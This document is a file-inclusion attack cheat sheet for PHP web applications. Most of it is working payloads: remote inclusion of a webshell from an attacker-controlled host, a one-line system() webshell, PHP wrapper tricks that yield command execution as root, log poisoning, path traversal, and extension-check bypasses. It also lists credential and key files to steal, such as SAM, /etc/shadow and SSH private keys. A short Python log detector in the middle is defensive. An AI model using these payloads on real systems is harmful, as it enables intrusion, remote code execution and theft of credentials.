File Inclusion
Procedure
- Determine the context (authentication, role, trust boundaries).
- Reproduce the attack vector in a controlled environment or with explicit authorization on the target system.
- Record the PoC and the impact (confidentiality, integrity, availability).
- The example requests and commands below are in English.
Methodology
Remote File Inclusion
http://example.com/index.php?file=http://<ATTACKER_IP>/webshell.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
PHP Wrappers
http://IP/index.php?page=php://filter/convert.base64-encode/resource=<file>
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
zip -0 payload.zip shell.php;
rm shell.php
http://localhost/index.php?file=zip://payload.zip%23shell.php&cmd=id
http://localhost/index.php?cmd=id&file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bDQo=
cat shell.php
<?php system($_GET['cmd']); ?>
curl -s -X POST -d @shell.php "http://localhost/index.php?cmd=id&file=php://input"
uid=0(root) gid=0(root) groups=0(root)
http://example.com/index.php?file=expect://whoami
LFI2RCE
http://10.11.1.113/alertConfigField.php?urlConfig=../../../usr/local/databases/shell.php&cmd=id
Log Poisoning
[...]
User-Agent:<?php system($_GET['cmd']);?>
[...]
http://example.com/?view=dog/../../var/log/apache2/access.log&cmd=whoami
Path Traversal
http://example.com/?view=images/../../../../etc/passwd
Validation of file extension
Null byte
http://example/file=http://<ATTACKER_IP>/Revshells/shell.php%00.png
Comments
http://example/file=/etc/passwd#image.png
Parameter
http://example/file=/etc/passwd?fake=image.png
Miscellany
webshell.php%0A.png
webshell.php\n.png
webshell.php\u000a.png
webshell.php\u560a.png
webshell.php%E5%98%8A.png
webshell.php;.png
webshell.php%3B.png
webshell.php\u003b.png
webshell.php\u563b.png
webshell.php%E5%98%BB.png
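Seen from the detection side, the request shapes listed above (remote inclusion, PHP wrappers, traversal into log files, extension-check bypasses) can be flagged when triaging web server access logs. The following Python function is an added example, not part of the original page; the rule labels, the `classify` and `fully_decode` names and the sample request targets are assumptions constructed here.

```python
import re
from urllib.parse import urlsplit, unquote

# Rule labels are this example's own; the patterns mirror request shapes listed on this page.
RULES = {
    "wrapper": re.compile(r"^(php|zip|data|expect)://", re.I),
    "remote": re.compile(r"^((https?|ftp)://|\\\\[^\\]+\\)", re.I),
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),
    # NUL, CR/LF, ';', '#', '?' (or the U+560A / U+563B variants) before an image suffix
    "ext-bypass": re.compile(r"[\x00\r\n;#?\u560a\u563b][^/\\]*\.(png|jpe?g|gif)$", re.I),
    "log-include": re.compile(r"/(access|error)[._]log$", re.I),
}

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request_target):
    """Return the sorted rule labels matched by any query parameter value."""
    findings = set()
    for pair in urlsplit(request_target).query.split("&"):
        _name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        findings.update(label for label, rx in RULES.items() if rx.search(value))
    return sorted(findings)

# Constructed sample request targets (not real traffic).
SAMPLES = [
    "/index.php?page=about&lang=en",
    "/index.php?page=php://filter/convert.base64-encode/resource=config",
    "/?view=dog/../../var/log/apache2/access.log&cmd=whoami",
    "/index.php?file=http://files.example.net/shell.php%00.png",
    "/index.php?file=%252e%252e%252fetc%252fpasswd",
    "/upload.php?name=webshell.php%E5%98%8A.png",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target), target)
```

Matches are triage hints, not verdicts: a legitimate parameter that carries a full URL will also hit the `remote` rule, so pair the output with an allowlist of parameters expected to hold URLs.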
Fuzzing
ffuf -u http://example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=FUZZ -w file_inclusion_linux.txt -fs 0-1000
Windows
# System Files
c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
windows\repair\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
# Web Files
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
Linux
# File system users and groups
/etc/shadow
/etc/passwd
/etc/group
/etc/hostname
/etc/hosts
/etc/crontab
/etc/host.conf
/etc/resolv.conf
/etc/issue
/etc/samba/smb.conf
/dev/tcp/<IP>/<PORT>
/etc/sudoers
/etc/os-release
/etc/ls-release
/etc/lsb-release
/etc/redhat-release
/etc/*-release
# Command history files
~/.bash_history
/root/.bash_history
~/.zsh_history
/root/.zsh_history
~/.mysql_history
/root/.mysql_history
# SSH Files
~/.ssh/authorized_keys
~/.ssh/id_rsa
~/.ssh/id_rsa.keystore
~/.ssh/id_rsa.pub
~/.ssh/known_hosts
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
# Filesystems to be mounted at boot time
/etc/fstab
# Currently mounted filesystems.
/etc/mtab
# Process files
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/environ
/proc/self/cmdline
# Logs
/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/httpd/error_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
# Web Files
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/default-ssl.conf